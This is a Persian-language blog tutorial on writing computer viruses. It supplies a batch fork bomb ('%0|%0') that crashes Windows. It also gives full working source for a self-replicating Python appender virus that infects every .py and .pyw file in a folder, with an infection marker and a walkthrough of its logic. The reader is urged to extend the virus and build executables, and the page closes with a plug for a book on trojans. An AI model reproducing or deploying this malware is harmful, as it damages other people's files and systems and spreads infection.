آموزش ویروس نویسی به زبان پایتون

ویروس‌ها را برنامه‌هایی هوشمند و خطرناک می‌دانند که خود به خود اجرا و تکثیر شده و اثرات تخریبی زیادی دارند , ما میتونیم ویروس ها رو طوری برنامه ریزی کنیم که کار های مختلفی رو انجام بدن , مثل سیستم رو خاموش کنن, یک درایو رو به صورت کامل فرمت کنن و…. و بسته به برنامه ریزی ما میتونه اون ویروس خطرناک تر بشه

ویروس ها در ویندوز

همیشه تا اسم ویروس می آید فکر می کنیم که این نوع کد مخرب باید یک پیچیدگی زیاد و کدنویسی عجیب و غریبی داشته باشد اما قبل از اینکه بگوییم که چگونه یک ویروس ساده ایجاد کنیم به این تعریف توجه کنید که تعریف ویروس این است که به قطعه کدی گفته می شود که کاری انجام می دهد که از نظر کاربران خوش آیند نیست و نباید انجام شود. همیشه قرار نیست یک برنامه نویس حرفه ای باشید تا بتوانید یک ویروس بنویسید ، یکی از ساده ترین انواع ویروس های دنیا تنها با چند خط و بعضا چند کاراکتر کد ایجاد می شود و به زبان Batch در ویندوز و بصورت Shell Script در لینوکس هم قابل اجرا هست ، این ویروس به عنوان Fork Bomb شناخته می شود و باعث می شود که سیستم شما چه ویندوزی و چه لینوکسی Crash کند ، ساختار کاری این ویروس به این شکل است که یک Process ایجاد می کند که این Process دو Process زیر مجموعه ایجاد می کند و به همین ترتیب بصورت دو دویی Process ایجاد می شود به نحوی که دیگر CPU تحمل نگهداری اینقدر Process را نداشته و Crash می کند ، ایجاد کردن این ویروس بسیار ساده است کافیست مراحل زیر را دنبال کنید :

ایجاد ویروس Fork Bomb

یک فایل Notepad باز کنید و بعد کد زیر را در این فایل وارد کنید و پسوند فایل را به BAT تغییر دهید ، فایل بصورت fork.bat ایجاد خواهد شد و یک ویروس 5 کاراکتری در ویندوز ایجاد می کند ، به محض اینکه بر روی این فایل دابل کلیک کنید تا 30 ثانیه بعد ویندوز شما قطعا Crash خوهد کرد و قطعا در Task Manager بیش از 500 عدد پردازش به یکباره ایجاد می شود که در Command Prompt مشاهده می شود ، دقت کنید اینکار را در کامپیوتر خودتان تست نکنید :

%0|%0

ویروس نویسی در پایتون

در مطالب قبلی ابزار های مختلفی رو ما با پایتون ساختیم , پایتون زبان بسیار قدرتمندی است و تقریبا میشه هر چیزی رو باهاش ساخت , در این آموزش میخواهیم با کمک زبان برنامه نویسی پایتون یک ویروس بسازیم که خودش رو درون فایل هایه دیگه کپی میکنه ..البته این یه کد ساده و مقدماتیه که شما میتونین اونو گسترشش بدین , شما میتونید انواع اقسام ویروس های مختلف رو بنویسید و تبدیل به فایل های اجرایی سیستم عامل های مختلف کنید و اجرا کنید.

python یک زبان برنامه نویسی تفسیری  رایگان است که برای اکثر سیستم عامل ها در دسترس است. یک زبان برنامه نویسیه  شیء گرا ، تعاملی ، قابل حمل و دارای قابلیت  یادگیری بسیار آسان است.در تعدادی از سیستم عامل ها قابلیت  تفسیر و اجرا دارد. ، این باعث می شود ایده های بسیار خوبی برای ویروس های جدید داشته باشیم. خب  بزن بریم برای اولین ویروس

appender پایتون ویروس

من یک برنامه کوچیک که کار اضافه کردن و پیوست دادن رو انجام میده رو به شما نشون میدم  .اضافه کردن  نوعی آلودگی به پرونده های  استاندارد.اضافه کننده در واقع  کد ویروس رو  بعد از کد عادی بصورت خودکار اضافه میکنه  .در نتیجه  ، ویروس بعد از کد میزبان اجرا می شود. و در نتیجه ویروس در صورت جابه جایی فایل و اجرا تکثیر میشه

import glob #!
from string import * #!
Files=glob.glob('*.py') + glob.glob('*.pyw') #!
for files in Files : #!
  vCode= open (__file__, 'r', encoding="utf8") #!
  victim = open (files,'r', encoding="utf8") #!
  readvictim = victim.read() #!
  if str.find(readvictim,'-=::Vort3x::=-') == -1 : #!
    victim = open (files,'a') #!
    for code in vCode.readlines(): #!
      if ("#!") in code : #!
        vCode.close() #!
        mycode=(chr(10)+code) #!
        victim.write(mycode) #!
#___pysoft.ir___ #!

خب کد چطوری کار میکنه :

 • ابتدا تمام فایل های که پسوند (py,pyw) را دارند رو در پوشه جاری پیدا میکنه
 • بررسی میکنه که آیا نشانگر ویروس داخل اون فایل ها هست یا نه .این ویروس دارای 2 نشانگر است که بعداً توضیح  میدم.
 • کد خودش رو پیدا می کنه
 • تمام فایل های که در مرحله اول پیدا کرده بودیم رو باز و کد ویروس رو در انتهایه اونها کپی میکنه
 • بستن تمام فایل ها . و تمام

نشانگر ها

چرا دارای 2 نشانگر است .خوب ، ما از اینها استفاده می کنیم تا کد ویروسی که باید کپی شود را تشخیص بدهیم .ویروس فقط کدی را که "!#" دارد کپی می کند. در انتهایه هر خط .راه های دیگری برای انجام این کار وجود دارد ، اما خب کار این روش هم کار میکنه . XD.

سپس ما نشانگر عفونت را داریم "- = :: Vort3x :: = -" این بدین ترتیب است که می توانیم ببینیم فایل مورد نظر قبلا آلوده شده است یا نه.اگر اصلاً از نشانگر عفونت استفاده نکنیم ویروس خودش رو تو فایل های که قبلا کپی کرده کپی میکنه و باعث میشه حجم فایل ها بسیار افزایش پیدا کنه .

 

معرفی کتاب

زمانی که می خواهیم ابرازهای قدرتمند و کارا در زمینه هکینگ و تست نفوذ ایجاد کنیم، پایتون زبانی است که منتخب بسیاری از تحلیل گران امنیتی و هکر می شود. اما این جادو چگونه انجام می شود؟ در این کتاب با قابلیت های خیره کننده پایتون در بخش امنیت اطلاعات آشنا می شویم. نرم افزار استراق سمع شبکه، آنالیز کننده پکت های شبکه، آلوده کردن ماشین های مجازی، تروجان های مخفی و بسیاری ابزارهای دیگر را خواهیم نوشت. همچنین در این کتاب زمانی را برای نوشتن کدهایی که بتواند به سیستم های ویندوزی آسیب بزند، خواهیم گذاشت. پایتون زبان برنامه نویسی هکر هاست. حتی فریمورک اکسپلویت CANVAS نیز با پایتون نوشته شده است. با این کتاب شما متوجه خواهید شد که فرق بسیار زیادی بین Script kiddies و هکرهای حرفه ای که خودشان ابزارهایشان را می نویسند و به ندرت از ابزارهای نوشته شده توسط سایر افراد استفاده می کنند ، وجود دارد.